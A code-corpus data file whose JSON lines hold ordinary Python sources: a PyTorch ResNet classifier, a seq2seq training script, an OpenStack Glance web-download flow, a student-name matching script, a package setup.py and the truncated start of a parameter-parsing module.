+{"seq_id": "23402832", "text": "from config.parameters import *\nimport torch as t\nfrom torch import nn\nimport torch.nn.functional as F\nimport os\nfrom torchvision import models\nfrom torch.nn import init\nimport torch\n\n\ndef weights_init_classifier(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n init.normal_(m.weight.data, std=0.001)\n init.constant_(m.bias.data, 0.0)\n\n\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes,\n out_planes,\n kernel_size=3,\n stride=stride,\n padding=dilation,\n groups=groups,\n bias=False,\n dilation=dilation)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes,\n out_planes,\n kernel_size=1,\n stride=stride,\n bias=False)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, inchannel, outchannel, stride=1):\n super(ResidualBlock, self).__init__()\n self.left = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(outchannel,\n outchannel,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True))\n self.shortcut = nn.Sequential()\n if stride != 1 or inchannel != outchannel:\n self.shortcut = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=1,\n stride=stride,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True))\n\n def forward(self, x):\n out = self.left(x)\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n def __init__(self, inchannel, outchannel, stride=1):\n super(ResidualBlock, self).__init__()\n self.bottle = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True),\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True),\n nn.Conv2d(outchannel,\n outchannel,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True),\n nn.ReLU(inplace=True))\n self.shortcut = nn.Sequential()\n if stride != 1 or inchannel != outchannel:\n self.shortcut = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=1,\n stride=stride,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True))\n\n def forward(self, x):\n out = self.left(x)\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass DualResNet(nn.Module):\n def __init__(self, ResidualBlock, num_classes=62):\n super(DualResNet, self).__init__()\n self.inchannel = 64\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64, track_running_stats=True),\n nn.ReLU(),\n )\n # https://blog.csdn.net/weixin_43624538/article/details/85049699\n # part 1: ResidualBlock basic\n # res18 2 2 2 2\n # res34 3 4 6 3\n self.layer1 = self.make_layer(ResidualBlock, 64, 2, stride=1)\n self.layer2 = self.make_layer(ResidualBlock, 128, 2, stride=2)\n self.layer3 = self.make_layer(ResidualBlock, 256, 2, stride=2)\n self.layer4 = self.make_layer(ResidualBlock, 512, 2, stride=2)\n self.maxpool = nn.AdaptiveMaxPool2d(1)\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.reduce_layer = nn.Conv2d(1024, 512, 1)\n\n self.drop = nn.Dropout(0.5)\n self.fc1 = nn.Linear(512, num_classes)\n self.fc2 = nn.Linear(512, num_classes)\n self.fc3 = nn.Linear(512, num_classes)\n self.fc4 = nn.Linear(512, num_classes)\n\n def make_layer(self, block, channels, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1) # strides=[1,1]\n layers = []\n for stride in strides:\n layers.append(block(self.inchannel, channels, stride))\n self.inchannel = channels\n return nn.Sequential(*layers)\n\n def forward(self, x):\n bs = x.shape[0]\n x = self.conv1(x)\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n x1 = self.maxpool(x)\n x2 = self.avgpool(x)\n x = torch.cat([x1,x2], dim=1)\n x = self.reduce_layer(x).view(bs, -1)\n x = self.drop(x)\n y1 = self.fc1(x)\n y2 = self.fc2(x)\n y3 = self.fc3(x)\n y4 = self.fc4(x)\n return y1, y2, y3, y4\n\n def save(self, circle):\n name = \"./weights/DualresNet\" + str(circle) + \".pth\"\n t.save(self.state_dict(), name)\n name2 = \"./weights/DualresNet_new.pth\"\n t.save(self.state_dict(), name2)\n\n def load_model(self, weight_path):\n fileList = os.listdir(\"./weights/\")\n # print(fileList)\n if \"DualresNet_new.pth\" in fileList:\n name = \"./weights/DualresNet_new.pth\"\n self.load_state_dict(t.load(name))\n print(\"the latest model has been load\")\n elif os.path.exists(weight_path):\n self.load_state_dict(t.load(weight_path))\n print(\"load %s success!\" % weight_path)\n\n\nclass ClassBlock(nn.Module):\n def __init__(self,\n input_dim,\n class_num,\n dropout=False,\n relu=False,\n num_bottleneck=512):\n super(ClassBlock, self).__init__()\n add_block = []\n #add_block += [nn.Linear(input_dim, num_bottleneck)]\n num_bottleneck = input_dim\n add_block += [nn.BatchNorm1d(num_bottleneck)]\n if relu:\n add_block += [nn.LeakyReLU(0.1)]\n if dropout:\n add_block += [nn.Dropout(p=0.5)]\n add_block = nn.Sequential(*add_block)\n add_block.apply(weights_init_kaiming)\n\n classifier = []\n classifier += [nn.Linear(num_bottleneck, class_num)]\n classifier = nn.Sequential(*classifier)\n classifier.apply(weights_init_classifier)\n\n self.add_block = add_block\n self.classifier = classifier\n\n def forward(self, x):\n f = self.add_block(x)\n f_norm = f.norm(p=2, dim=1, keepdim=True) + 1e-8\n f = f.div(f_norm)\n x = self.classifier(f)\n return x\n\n\ndef weights_init_kaiming(m):\n classname = m.__class__.__name__\n # print(classname)\n if classname.find('Conv') != -1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_in')\n elif classname.find('Linear') != -1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_out')\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm1d') != -1:\n init.normal_(m.weight.data, 1.0, 0.02)\n init.constant_(m.bias.data, 0.0)\n", "sub_path": "model/dualpooling.py", "file_name": "dualpooling.py", "file_ext": "py", "file_size_in_byte": 8069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.init.normal_", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveMaxPool2d", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 175, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 210, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.nn.init.constant", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 234, "usage_type": "name"}]} +{"seq_id": "591061639", "text": "import torch\nimport logging\n\nfrom machine.tasks import get_task\nfrom machine.trainer import SupervisedTrainer\nfrom machine.loss import NLLLoss\nfrom machine.metrics import SequenceAccuracy\n\nfrom data import get_iters\nfrom model import get_baseline_model\n\n\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef init_logging():\n LOG_FORMAT = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n logging.basicConfig(format=LOG_FORMAT, level=getattr(\n logging, 'INFO'))\n\n\nNUM_EPOCHS = 10\nHIDDEN_SIZE = 128\ninit_logging()\n\n# Get data\ntrain_iter, valid_iter, test_iters, src, tgt = get_iters()\n\n# Prepare model\nbaseline_seq2seq = get_baseline_model(src, tgt, HIDDEN_SIZE)\nbaseline_seq2seq.to(device)\n\n# Prepare training\npad = tgt.vocab.stoi[tgt.pad_token]\nlosses = [NLLLoss(ignore_index=pad).to(device)]\nmetrics = [SequenceAccuracy(ignore_index=pad)]\ntrainer = SupervisedTrainer(expt_dir='runs/models/baseline')\n\n# Train\nlogging.info(\"Training\")\nseq2seq, logs = trainer.train(baseline_seq2seq, train_iter,\n dev_data=valid_iter,\n monitor_data=test_iters,\n num_epochs=NUM_EPOCHS,\n optimizer='adam',\n checkpoint_path='runs/models/baseline',\n losses=losses, metrics=metrics,\n checkpoint_every=100,\n print_every=100)\n", "sub_path": "baseline.py", "file_name": "baseline.py", "file_ext": "py", "file_size_in_byte": 1538, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "data.get_iters", "line_number": 30, "usage_type": "call"}, {"api_name": "model.get_baseline_model", "line_number": 33, "usage_type": "call"}, {"api_name": "machine.loss.NLLLoss", "line_number": 38, "usage_type": "call"}, {"api_name": "machine.metrics.SequenceAccuracy", "line_number": 39, "usage_type": "call"}, {"api_name": "machine.trainer.SupervisedTrainer", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "62359904", "text": "# Copyright 2018 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom glance_store import backend\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom taskflow.patterns import linear_flow as lf\nfrom taskflow import task\nfrom taskflow.types import failure\n\nfrom glance.common import exception\nfrom glance.common.scripts import utils as script_utils\nfrom glance.i18n import _, _LE\n\nLOG = logging.getLogger(__name__)\n\nCONF = cfg.CONF\n\n\nclass _WebDownload(task.Task):\n\n default_provides = 'file_uri'\n\n def __init__(self, task_id, task_type, image_repo, image_id, uri):\n self.task_id = task_id\n self.task_type = task_type\n self.image_repo = image_repo\n self.image_id = image_id\n self.uri = uri\n super(_WebDownload, self).__init__(\n name='%s-WebDownload-%s' % (task_type, task_id))\n\n if CONF.node_staging_uri is None:\n msg = (_(\"%(task_id)s of %(task_type)s not configured \"\n \"properly. Missing node_staging_uri: %(work_dir)s\") %\n {'task_id': self.task_id,\n 'task_type': self.task_type,\n 'work_dir': CONF.node_staging_uri})\n raise exception.BadTaskConfiguration(msg)\n\n self.store = self._build_store()\n\n def _build_store(self):\n # NOTE(flaper87): Due to the nice glance_store api (#sarcasm), we're\n # forced to build our own config object, register the required options\n # (and by required I mean *ALL* of them, even the ones we don't want),\n # and create our own store instance by calling a private function.\n # This is certainly unfortunate but it's the best we can do until the\n # glance_store refactor is done. A good thing is that glance_store is\n # under our team's management and it gates on Glance so changes to\n # this API will (should?) break task's tests.\n # TODO(abhishekk): After removal of backend module from glance_store\n # need to change this to use multi_backend module.\n conf = cfg.ConfigOpts()\n try:\n backend.register_opts(conf)\n except cfg.DuplicateOptError:\n pass\n\n conf.set_override('filesystem_store_datadir',\n CONF.node_staging_uri[7:],\n group='glance_store')\n\n # NOTE(flaper87): Do not even try to judge me for this... :(\n # With the glance_store refactor, this code will change, until\n # that happens, we don't have a better option and this is the\n # least worst one, IMHO.\n store = backend._load_store(conf, 'file')\n\n if store is None:\n msg = (_(\"%(task_id)s of %(task_type)s not configured \"\n \"properly. Could not load the filesystem store\") %\n {'task_id': self.task_id, 'task_type': self.task_type})\n raise exception.BadTaskConfiguration(msg)\n\n store.configure()\n return store\n\n def execute(self):\n \"\"\"Create temp file into store and return path to it\n\n :param image_id: Glance Image ID\n \"\"\"\n # NOTE(jokke): We've decided to use staging area for this task as\n # a way to expect users to configure a local store for pre-import\n # works on the image to happen.\n #\n # While using any path should be \"technically\" fine, it's not what\n # we recommend as the best solution. For more details on this, please\n # refer to the comment in the `_ImportToStore.execute` method.\n data = script_utils.get_image_data_iter(self.uri)\n\n path = self.store.add(self.image_id, data, 0)[0]\n\n return path\n\n def revert(self, result, **kwargs):\n if isinstance(result, failure.Failure):\n LOG.exception(_LE('Task: %(task_id)s failed to import image '\n '%(image_id)s to the filesystem.'),\n {'task_id': self.task_id,\n 'image_id': self.image_id})\n\n\ndef get_flow(**kwargs):\n \"\"\"Return task flow for web-download.\n\n :param task_id: Task ID.\n :param task_type: Type of the task.\n :param image_repo: Image repository used.\n :param uri: URI the image data is downloaded from.\n \"\"\"\n task_id = kwargs.get('task_id')\n task_type = kwargs.get('task_type')\n image_repo = kwargs.get('image_repo')\n image_id = kwargs.get('image_id')\n uri = kwargs.get('import_req')['method'].get('uri')\n\n return lf.Flow(task_type).add(\n _WebDownload(task_id, task_type, image_repo, image_id, uri),\n )\n", "sub_path": "glance/async_/flows/_internal_plugins/web_download.py", "file_name": "web_download.py", "file_ext": "py", "file_size_in_byte": 5145, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oslo_log.log.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 27, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 29, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "taskflow.task.Task", "line_number": 32, "usage_type": "attribute"}, {"api_name": "taskflow.task", "line_number": 32, "usage_type": "name"}, {"api_name": "glance.i18n._", "line_number": 46, "usage_type": "call"}, {"api_name": "glance.common.exception.BadTaskConfiguration", "line_number": 51, "usage_type": "call"}, {"api_name": "glance.common.exception", "line_number": 51, "usage_type": "name"}, {"api_name": "oslo_config.cfg.ConfigOpts", "line_number": 66, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 66, "usage_type": "name"}, {"api_name": "glance_store.backend.register_opts", "line_number": 68, "usage_type": "call"}, {"api_name": "glance_store.backend", "line_number": 68, "usage_type": "name"}, {"api_name": "oslo_config.cfg.DuplicateOptError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 69, "usage_type": "name"}, {"api_name": "glance_store.backend._load_store", "line_number": 80, "usage_type": "call"}, {"api_name": "glance_store.backend", "line_number": 80, "usage_type": "name"}, {"api_name": "glance.i18n._", "line_number": 83, "usage_type": "call"}, {"api_name": "glance.common.exception.BadTaskConfiguration", "line_number": 86, "usage_type": "call"}, {"api_name": "glance.common.exception", "line_number": 86, "usage_type": "name"}, {"api_name": "glance.common.scripts.utils.get_image_data_iter", "line_number": 103, "usage_type": "call"}, {"api_name": "glance.common.scripts.utils", "line_number": 103, "usage_type": "name"}, {"api_name": "taskflow.types.failure.Failure", "line_number": 110, "usage_type": "attribute"}, {"api_name": "taskflow.types.failure", "line_number": 110, "usage_type": "name"}, {"api_name": "glance.i18n._LE", "line_number": 111, "usage_type": "call"}, {"api_name": "taskflow.patterns.linear_flow.Flow", "line_number": 131, "usage_type": "call"}, {"api_name": "taskflow.patterns.linear_flow", "line_number": 131, "usage_type": "name"}]} +{"seq_id": "559983998", "text": "#Description: Given a metadata spreadsheet for one semester and a folder with files \n#from that semester, the script looks to see if the names in the filenames match the \n#names in the spreadsheet\n\n#use case: python match_names.py --directory=../../Spring\\ 2019/UTF8_encoded/ --master_file=Spring_2019_test_processed.csv \n\nimport argparse\nimport sys\nimport pandas\nimport os\nimport re\n\nparser = argparse.ArgumentParser(description='Matching names')\nparser.add_argument('--overwrite', action='store_true')\nparser.add_argument('--directory', action=\"store\", dest='dir', default='')\nparser.add_argument('--master_file', action=\"store\", dest='master', default='')\nargs = parser.parse_args()\n\n\nif '.xls' in args.master:\n master_file = pandas.ExcelFile(args.master)\n master_data = pandas.read_excel(master_file)\nelif '.csv' in args.master:\n master_data = pandas.read_csv(args.master)\n\n\n# new data frame with split value columns\nnew = master_data[\"Name\"].str.split(\",\", n = 1, expand = True)\n \n# making separate first name column from new data frame\nmaster_data[\"First Name\"]= new[1]\n \n# making separate last name column from new data frame\nmaster_data[\"Last Name\"]= new[0]\n \n# combine First Name and Last Name\nmaster_data['Name'] = master_data['First Name'].str.cat(master_data['Last Name'],sep=\" \")\n\nlist_of_names = master_data['Name'].values\n#print(list_of_names)\n\nstudent_filenames = []\nstudent_not_found = []\nfor dirpath, dirnames, files in os.walk(args.dir):\n for filename in files:\n found_text_files = False \n if '.txt' in filename:\n found_text_files = True\n filename_parts = filename.split('- ')\n #print(filename_parts)\n student_filename = re.sub(r'\\.txt', r'', filename_parts[1])\n student_filename = re.sub(r'\\s+', r' ', student_filename)\n if student_filename not in student_filenames:\n student_filenames.append(student_filename)\n#print(student_filenames)\n\nfor name in list_of_names:\n if name not in student_filenames:\n if name not in student_not_found:\n student_not_found.append(name)\nprint(\"These student names are in the spreadsheet but NOT in the filenames:\") \nprint('\\n'.join(map(str, student_not_found)))\nprint(\"***************\") \n\nstudent_filenames_not_found = []\nfor student_filename in student_filenames:\n if student_filename not in list_of_names:\n student_filenames_not_found.append(student_filename)\nprint(\"These student names are NOT in the spreadsheet but are in the filenames:\")\nprint('\\n'.join(map(str, student_filenames_not_found)))\n\n\n\n\n\n \n\n\n\n\n", "sub_path": "metadata_processing/archived_scripts/match_names.py", "file_name": "match_names.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "376985086", "text": "from setuptools import setup\nimport sys\nimport platform\n\nversion='1.1.1'\n\nrequires = ['mlx9064x-driver>=1.1.3',\n ]\n\n\nif platform.machine().startswith('armv'):\n requires += [\n 'opencv-contrib-python>=3',\n ]\nelse:\n requires += [\n 'opencv-contrib-python>=4',\n ]\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='mlx9064x-blob-detection',\n version=version,\n description='Blob detection for MLX90640-41',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='Apache License, Version 2.0',\n entry_points = {'console_scripts': ['mlx9064x-blob-detection = examples.mlx90640_opencv_blob_detection:main']},\n install_requires=requires,\n url = 'https://github.com/melexis-fir/mlx9064x-blob-detection-py', # Provide either the link to your github or to your website\n download_url = 'https://github.com/melexis-fir/mlx9064x-blob-detection-py/archive/V'+version+'.tar.gz',\n packages=['examples'],\n classifiers=[\n # complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: Microsoft :: Windows',\n\t'Operating System :: POSIX',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Utilities',\n ],\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "platform.machine", "line_number": 11, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "426128669", "text": "import re\n\nfrom collections import namedtuple\nfrom typing import Dict, List, Optional, Container, Any, Union, Callable, Set, Iterable\n\n# https://stackoverflow.com/questions/249791/regex-for-quoted-string-with-escaping-quotes\n# https://stackoverflow.com/questions/21105360/regex-find-comma-not-inside-quotes\n# The ` ?` is just so it matches the space after during the replace with blank so there's no double spaces\n\n_param_re = re.compile(\n r'(([a-zA-Z_+/.\\-]+)(!=|>=|<=|>|<|==|=)((\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+)(,(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+))*)) ?')\n# The intention of having both = and == is that they might have different behavior.\n# What that means depends on the usage.\n_param_operator_re = re.compile(r'!=|==|=|>|<|>=|<=')\n_param_argument_re = re.compile(r'(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+)')\n_param_string_re = re.compile(r'(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\')')\n\n_tag_re = re.compile(r'(\\$[^\\s]+) ?')\n\nNamedArgument = namedtuple('NamedArgument', 'name operator value')\nArgumentValue = 